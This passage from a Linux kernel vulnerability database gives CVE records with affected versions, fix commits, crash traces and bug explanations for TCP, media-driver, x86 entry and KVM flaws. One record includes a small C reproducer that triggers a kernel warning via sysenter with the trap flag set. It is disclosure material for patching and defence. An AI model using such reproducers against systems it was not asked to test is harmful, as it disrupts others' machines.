"versionEndExcluding": "4.19.318",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.280",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: avoid too many retransmit packets\n\nIf a TCP socket is using TCP_USER_TIMEOUT, and the other peer\nretracted its window to zero, tcp_retransmit_timer() can\nretransmit a packet every two jiffies (2 ms for HZ=1000),\nfor about 4 minutes after TCP_USER_TIMEOUT has \u0027expired\u0027.\n\nThe fix is to make sure tcp_rtx_probe0_timed_out() takes\nicsk-\u003eicsk_user_timeout into account.\n\nBefore blamed commit, the socket would not timeout after\nicsk-\u003eicsk_user_timeout, but would use standard exponential\nbackoff for the retransmits.\n\nAlso worth noting that before commit e89688e3e978 (\"net: tcp:\nfix unexcepted socket die when snd_wnd is 0\"), the issue\nwould last 2 minutes instead of 4."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:19:56.819Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7bb7670f92bfbd05fc41a8f9a8f358b7ffed65f4"
},
{
"url": "https://git.kernel.org/stable/c/d2346fca5bed130dc712f276ac63450201d52969"
},
{
"url": "https://git.kernel.org/stable/c/5d7e64d70a11d988553a08239c810a658e841982"
},
{
"url": "https://git.kernel.org/stable/c/04317a2471c2f637b4c49cbd0e9c0d04a519f570"
},
{
"url": "https://git.kernel.org/stable/c/e113cddefa27bbf5a79f72387b8fbd432a61a466"
},
{
"url": "https://git.kernel.org/stable/c/dfcdd7f89e401d2c6616be90c76c2fac3fa98fde"
},
{
"url": "https://git.kernel.org/stable/c/66cb64a1d2239cd0309f9b5038b05462570a5be1"
},
{
"url": "https://git.kernel.org/stable/c/97a9063518f198ec0adb2ecb89789de342bb8283"
}
],
"title": "tcp: avoid too many retransmit packets",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41007",
"datePublished": "2024-07-15T08:48:10.174Z",
"dateReserved": "2024-07-12T12:17:45.610Z",
"dateUpdated": "2025-05-04T09:19:56.819Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43900 (GCVE-0-2024-43900)
Vulnerability from cvelistv5
Published
2024-08-26 10:10
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: xc2028: avoid use-after-free in load_firmware_cb()
syzkaller reported use-after-free in load_firmware_cb() [1].
The reason is because the module allocated a struct tuner in tuner_probe(),
and then the module initialization failed, the struct tuner was released.
A worker which created during module initialization accesses this struct
tuner later, it caused use-after-free.
The process is as follows:
task-6504 worker_thread
tuner_probe <= alloc dvb_frontend [2]
...
request_firmware_nowait <= create a worker
...
tuner_remove <= free dvb_frontend
...
request_firmware_work_func <= the firmware is ready
load_firmware_cb <= but now the dvb_frontend has been freed
To fix the issue, check the dvd_frontend in load_firmware_cb(), if it is
null, report a warning and just return.
[1]:
==================================================================
BUG: KASAN: use-after-free in load_firmware_cb+0x1310/0x17a0
Read of size 8 at addr ffff8000d7ca2308 by task kworker/2:3/6504
Call trace:
load_firmware_cb+0x1310/0x17a0
request_firmware_work_func+0x128/0x220
process_one_work+0x770/0x1824
worker_thread+0x488/0xea0
kthread+0x300/0x430
ret_from_fork+0x10/0x20
Allocated by task 6504:
kzalloc
tuner_probe+0xb0/0x1430
i2c_device_probe+0x92c/0xaf0
really_probe+0x678/0xcd0
driver_probe_device+0x280/0x370
__device_attach_driver+0x220/0x330
bus_for_each_drv+0x134/0x1c0
__device_attach+0x1f4/0x410
device_initial_probe+0x20/0x30
bus_probe_device+0x184/0x200
device_add+0x924/0x12c0
device_register+0x24/0x30
i2c_new_device+0x4e0/0xc44
v4l2_i2c_new_subdev_board+0xbc/0x290
v4l2_i2c_new_subdev+0xc8/0x104
em28xx_v4l2_init+0x1dd0/0x3770
Freed by task 6504:
kfree+0x238/0x4e4
tuner_remove+0x144/0x1c0
i2c_device_remove+0xc8/0x290
__device_release_driver+0x314/0x5fc
device_release_driver+0x30/0x44
bus_remove_device+0x244/0x490
device_del+0x350/0x900
device_unregister+0x28/0xd0
i2c_unregister_device+0x174/0x1d0
v4l2_device_unregister+0x224/0x380
em28xx_v4l2_init+0x1d90/0x3770
The buggy address belongs to the object at ffff8000d7ca2000
which belongs to the cache kmalloc-2k of size 2048
The buggy address is located 776 bytes inside of
2048-byte region [ffff8000d7ca2000, ffff8000d7ca2800)
The buggy address belongs to the page:
page:ffff7fe00035f280 count:1 mapcount:0 mapping:ffff8000c001f000 index:0x0
flags: 0x7ff800000000100(slab)
raw: 07ff800000000100 ffff7fe00049d880 0000000300000003 ffff8000c001f000
raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected
Memory state around the buggy address:
ffff8000d7ca2200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff8000d7ca2280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
>ffff8000d7ca2300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
^
ffff8000d7ca2380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff8000d7ca2400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
==================================================================
[2]
Actually, it is allocated for struct tuner, and dvb_frontend is inside.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43900",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:28:53.298476Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:57.642Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/tuners/xc2028.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ef517bdfc01818419f7bd426969a0c86b14f3e0e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "850304152d367f104d21c77cfbcc05806504218b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "208deb6d8c3cb8c3acb1f41eb31cf68ea08726d5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "68594cec291ff9523b9feb3f43fd853dcddd1f60",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/tuners/xc2028.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.105",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.105",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: xc2028: avoid use-after-free in load_firmware_cb()\n\nsyzkaller reported use-after-free in load_firmware_cb() [1].\nThe reason is because the module allocated a struct tuner in tuner_probe(),\nand then the module initialization failed, the struct tuner was released.\nA worker which created during module initialization accesses this struct\ntuner later, it caused use-after-free.\n\nThe process is as follows:\n\ntask-6504 worker_thread\ntuner_probe \u003c= alloc dvb_frontend [2]\n...\nrequest_firmware_nowait \u003c= create a worker\n...\ntuner_remove \u003c= free dvb_frontend\n...\n request_firmware_work_func \u003c= the firmware is ready\n load_firmware_cb \u003c= but now the dvb_frontend has been freed\n\nTo fix the issue, check the dvd_frontend in load_firmware_cb(), if it is\nnull, report a warning and just return.\n\n[1]:\n ==================================================================\n BUG: KASAN: use-after-free in load_firmware_cb+0x1310/0x17a0\n Read of size 8 at addr ffff8000d7ca2308 by task kworker/2:3/6504\n\n Call trace:\n load_firmware_cb+0x1310/0x17a0\n request_firmware_work_func+0x128/0x220\n process_one_work+0x770/0x1824\n worker_thread+0x488/0xea0\n kthread+0x300/0x430\n ret_from_fork+0x10/0x20\n\n Allocated by task 6504:\n kzalloc\n tuner_probe+0xb0/0x1430\n i2c_device_probe+0x92c/0xaf0\n really_probe+0x678/0xcd0\n driver_probe_device+0x280/0x370\n __device_attach_driver+0x220/0x330\n bus_for_each_drv+0x134/0x1c0\n __device_attach+0x1f4/0x410\n device_initial_probe+0x20/0x30\n bus_probe_device+0x184/0x200\n device_add+0x924/0x12c0\n device_register+0x24/0x30\n i2c_new_device+0x4e0/0xc44\n v4l2_i2c_new_subdev_board+0xbc/0x290\n v4l2_i2c_new_subdev+0xc8/0x104\n em28xx_v4l2_init+0x1dd0/0x3770\n\n Freed by task 6504:\n kfree+0x238/0x4e4\n tuner_remove+0x144/0x1c0\n i2c_device_remove+0xc8/0x290\n __device_release_driver+0x314/0x5fc\n device_release_driver+0x30/0x44\n bus_remove_device+0x244/0x490\n device_del+0x350/0x900\n device_unregister+0x28/0xd0\n i2c_unregister_device+0x174/0x1d0\n v4l2_device_unregister+0x224/0x380\n em28xx_v4l2_init+0x1d90/0x3770\n\n The buggy address belongs to the object at ffff8000d7ca2000\n which belongs to the cache kmalloc-2k of size 2048\n The buggy address is located 776 bytes inside of\n 2048-byte region [ffff8000d7ca2000, ffff8000d7ca2800)\n The buggy address belongs to the page:\n page:ffff7fe00035f280 count:1 mapcount:0 mapping:ffff8000c001f000 index:0x0\n flags: 0x7ff800000000100(slab)\n raw: 07ff800000000100 ffff7fe00049d880 0000000300000003 ffff8000c001f000\n raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff8000d7ca2200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n ffff8000d7ca2280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n \u003effff8000d7ca2300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n ^\n ffff8000d7ca2380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n ffff8000d7ca2400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n ==================================================================\n\n[2]\n Actually, it is allocated for struct tuner, and dvb_frontend is inside."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:50.907Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ef517bdfc01818419f7bd426969a0c86b14f3e0e"
},
{
"url": "https://git.kernel.org/stable/c/850304152d367f104d21c77cfbcc05806504218b"
},
{
"url": "https://git.kernel.org/stable/c/208deb6d8c3cb8c3acb1f41eb31cf68ea08726d5"
},
{
"url": "https://git.kernel.org/stable/c/68594cec291ff9523b9feb3f43fd853dcddd1f60"
}
],
"title": "media: xc2028: avoid use-after-free in load_firmware_cb()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43900",
"datePublished": "2024-08-26T10:10:58.767Z",
"dateReserved": "2024-08-17T09:11:59.291Z",
"dateUpdated": "2025-05-04T09:28:50.907Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42240 (GCVE-0-2024-42240)
Vulnerability from cvelistv5
Published
2024-08-07 15:14
Modified
2025-05-04 12:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
x86/bhi: Avoid warning in #DB handler due to BHI mitigation
When BHI mitigation is enabled, if SYSENTER is invoked with the TF flag set
then entry_SYSENTER_compat() uses CLEAR_BRANCH_HISTORY and calls the
clear_bhb_loop() before the TF flag is cleared. This causes the #DB handler
(exc_debug_kernel()) to issue a warning because single-step is used outside the
entry_SYSENTER_compat() function.
To address this issue, entry_SYSENTER_compat() should use CLEAR_BRANCH_HISTORY
after making sure the TF flag is cleared.
The problem can be reproduced with the following sequence:
$ cat sysenter_step.c
int main()
{ asm("pushf; pop %ax; bts $8,%ax; push %ax; popf; sysenter"); }
$ gcc -o sysenter_step sysenter_step.c
$ ./sysenter_step
Segmentation fault (core dumped)
The program is expected to crash, and the #DB handler will issue a warning.
Kernel log:
WARNING: CPU: 27 PID: 7000 at arch/x86/kernel/traps.c:1009 exc_debug_kernel+0xd2/0x160
...
RIP: 0010:exc_debug_kernel+0xd2/0x160
...
Call Trace:
<#DB>
? show_regs+0x68/0x80
? __warn+0x8c/0x140
? exc_debug_kernel+0xd2/0x160
? report_bug+0x175/0x1a0
? handle_bug+0x44/0x90
? exc_invalid_op+0x1c/0x70
? asm_exc_invalid_op+0x1f/0x30
? exc_debug_kernel+0xd2/0x160
exc_debug+0x43/0x50
asm_exc_debug+0x1e/0x40
RIP: 0010:clear_bhb_loop+0x0/0xb0
...
</#DB>
<TASK>
? entry_SYSENTER_compat_after_hwframe+0x6e/0x8d
</TASK>
[ bp: Massage commit message. ]
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bd53ec80f21839cfd4d852a6088279d602d67e5b Version: 07dbb10f153f483e8249acebdffedf922e2ec2e1 Version: eb36b0dce2138581bc6b5e39d0273cb4c96ded81 Version: 7390db8aea0d64e9deb28b8e1ce716f5020c7ee5 Version: 7390db8aea0d64e9deb28b8e1ce716f5020c7ee5 Version: 8f51637712e4da5be410a1666f8aee0d86eef898 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42240",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:13:51.001454Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:31.693Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/x86/entry/entry_64_compat.S"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "db56615e96c439e13783d7715330e824b4fd4b84",
"status": "affected",
"version": "bd53ec80f21839cfd4d852a6088279d602d67e5b",
"versionType": "git"
},
{
"lessThan": "a765679defe1dc1b8fa01928a6ad6361e72a1364",
"status": "affected",
"version": "07dbb10f153f483e8249acebdffedf922e2ec2e1",
"versionType": "git"
},
{
"lessThan": "dae3543db8f0cf8ac1a198c3bb4b6e3c24d576cf",
"status": "affected",
"version": "eb36b0dce2138581bc6b5e39d0273cb4c96ded81",
"versionType": "git"
},
{
"lessThan": "08518d48e5b744620524f0acd7c26c19bda7f513",
"status": "affected",
"version": "7390db8aea0d64e9deb28b8e1ce716f5020c7ee5",
"versionType": "git"
},
{
"lessThan": "ac8b270b61d48fcc61f052097777e3b5e11591e0",
"status": "affected",
"version": "7390db8aea0d64e9deb28b8e1ce716f5020c7ee5",
"versionType": "git"
},
{
"status": "affected",
"version": "8f51637712e4da5be410a1666f8aee0d86eef898",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/x86/entry/entry_64_compat.S"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.9"
},
{
"lessThan": "6.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "5.15.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"versionStartIncluding": "6.1.85",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"versionStartIncluding": "6.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.8.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/bhi: Avoid warning in #DB handler due to BHI mitigation\n\nWhen BHI mitigation is enabled, if SYSENTER is invoked with the TF flag set\nthen entry_SYSENTER_compat() uses CLEAR_BRANCH_HISTORY and calls the\nclear_bhb_loop() before the TF flag is cleared. This causes the #DB handler\n(exc_debug_kernel()) to issue a warning because single-step is used outside the\nentry_SYSENTER_compat() function.\n\nTo address this issue, entry_SYSENTER_compat() should use CLEAR_BRANCH_HISTORY\nafter making sure the TF flag is cleared.\n\nThe problem can be reproduced with the following sequence:\n\n $ cat sysenter_step.c\n int main()\n { asm(\"pushf; pop %ax; bts $8,%ax; push %ax; popf; sysenter\"); }\n\n $ gcc -o sysenter_step sysenter_step.c\n\n $ ./sysenter_step\n Segmentation fault (core dumped)\n\nThe program is expected to crash, and the #DB handler will issue a warning.\n\nKernel log:\n\n WARNING: CPU: 27 PID: 7000 at arch/x86/kernel/traps.c:1009 exc_debug_kernel+0xd2/0x160\n ...\n RIP: 0010:exc_debug_kernel+0xd2/0x160\n ...\n Call Trace:\n \u003c#DB\u003e\n ? show_regs+0x68/0x80\n ? __warn+0x8c/0x140\n ? exc_debug_kernel+0xd2/0x160\n ? report_bug+0x175/0x1a0\n ? handle_bug+0x44/0x90\n ? exc_invalid_op+0x1c/0x70\n ? asm_exc_invalid_op+0x1f/0x30\n ? exc_debug_kernel+0xd2/0x160\n exc_debug+0x43/0x50\n asm_exc_debug+0x1e/0x40\n RIP: 0010:clear_bhb_loop+0x0/0xb0\n ...\n \u003c/#DB\u003e\n \u003cTASK\u003e\n ? entry_SYSENTER_compat_after_hwframe+0x6e/0x8d\n \u003c/TASK\u003e\n\n [ bp: Massage commit message. ]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:57:48.564Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/db56615e96c439e13783d7715330e824b4fd4b84"
},
{
"url": "https://git.kernel.org/stable/c/a765679defe1dc1b8fa01928a6ad6361e72a1364"
},
{
"url": "https://git.kernel.org/stable/c/dae3543db8f0cf8ac1a198c3bb4b6e3c24d576cf"
},
{
"url": "https://git.kernel.org/stable/c/08518d48e5b744620524f0acd7c26c19bda7f513"
},
{
"url": "https://git.kernel.org/stable/c/ac8b270b61d48fcc61f052097777e3b5e11591e0"
}
],
"title": "x86/bhi: Avoid warning in #DB handler due to BHI mitigation",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42240",
"datePublished": "2024-08-07T15:14:27.977Z",
"dateReserved": "2024-07-30T07:40:12.253Z",
"dateUpdated": "2025-05-04T12:57:48.564Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48943 (GCVE-0-2022-48943)
Vulnerability from cvelistv5
Published
2024-08-22 03:30
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
KVM: x86/mmu: make apf token non-zero to fix bug
In current async pagefault logic, when a page is ready, KVM relies on
kvm_arch_can_dequeue_async_page_present() to determine whether to deliver
a READY event to the Guest. This function test token value of struct
kvm_vcpu_pv_apf_data, which must be reset to zero by Guest kernel when a
READY event is finished by Guest. If value is zero meaning that a READY
event is done, so the KVM can deliver another.
But the kvm_arch_setup_async_pf() may produce a valid token with zero
value, which is confused with previous mention and may lead the loss of
this READY event.
This bug may cause task blocked forever in Guest:
INFO: task stress:7532 blocked for more than 1254 seconds.
Not tainted 5.10.0 #16
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:stress state:D stack: 0 pid: 7532 ppid: 1409
flags:0x00000080
Call Trace:
__schedule+0x1e7/0x650
schedule+0x46/0xb0
kvm_async_pf_task_wait_schedule+0xad/0xe0
? exit_to_user_mode_prepare+0x60/0x70
__kvm_handle_async_pf+0x4f/0xb0
? asm_exc_page_fault+0x8/0x30
exc_page_fault+0x6f/0x110
? asm_exc_page_fault+0x8/0x30
asm_exc_page_fault+0x1e/0x30
RIP: 0033:0x402d00
RSP: 002b:00007ffd31912500 EFLAGS: 00010206
RAX: 0000000000071000 RBX: ffffffffffffffff RCX: 00000000021a32b0
RDX: 000000000007d011 RSI: 000000000007d000 RDI: 00000000021262b0
RBP: 00000000021262b0 R08: 0000000000000003 R09: 0000000000000086
R10: 00000000000000eb R11: 00007fefbdf2baa0 R12: 0000000000000000
R13: 0000000000000002 R14: 000000000007d000 R15: 0000000000001000
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48943",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:08.943998Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:10.679Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/x86/kvm/mmu/mmu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "72fdfc75d4217b32363cc80def3de2cb3fef3f02",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4c3644b6c96c5daa5149e5abddc07234eea47c7c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "62040f5cd7d937de547836e747b6aa8212fec573",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6f3c1fc53d86d580d8d6d749c4af23705e4f6f79",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/x86/kvm/mmu/mmu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: x86/mmu: make apf token non-zero to fix bug\n\nIn current async pagefault logic, when a page is ready, KVM relies on\nkvm_arch_can_dequeue_async_page_present() to determine whether to deliver\na READY event to the Guest. This function test token value of struct\nkvm_vcpu_pv_apf_data, which must be reset to zero by Guest kernel when a\nREADY event is finished by Guest. If value is zero meaning that a READY\nevent is done, so the KVM can deliver another.\nBut the kvm_arch_setup_async_pf() may produce a valid token with zero\nvalue, which is confused with previous mention and may lead the loss of\nthis READY event.\n\nThis bug may cause task blocked forever in Guest:\n INFO: task stress:7532 blocked for more than 1254 seconds.\n Not tainted 5.10.0 #16\n \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n task:stress state:D stack: 0 pid: 7532 ppid: 1409\n flags:0x00000080\n Call Trace:\n __schedule+0x1e7/0x650\n schedule+0x46/0xb0\n kvm_async_pf_task_wait_schedule+0xad/0xe0\n ? exit_to_user_mode_prepare+0x60/0x70\n __kvm_handle_async_pf+0x4f/0xb0\n ? asm_exc_page_fault+0x8/0x30\n exc_page_fault+0x6f/0x110\n ? asm_exc_page_fault+0x8/0x30\n asm_exc_page_fault+0x1e/0x30\n RIP: 0033:0x402d00\n RSP: 002b:00007ffd31912500 EFLAGS: 00010206\n RAX: 0000000000071000 RBX: ffffffffffffffff RCX: 00000000021a32b0\n RDX: 000000000007d011 RSI: 000000000007d000 RDI: 00000000021262b0\n RBP: 00000000021262b0 R08: 0000000000000003 R09: 